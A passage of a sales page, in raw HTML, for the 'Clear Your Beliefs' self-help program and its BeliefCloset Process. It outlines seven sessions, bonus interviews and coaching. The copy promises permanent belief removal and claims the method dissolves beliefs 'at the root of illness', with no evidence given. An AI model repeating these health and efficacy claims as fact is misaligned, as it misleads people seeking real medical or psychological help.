so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile 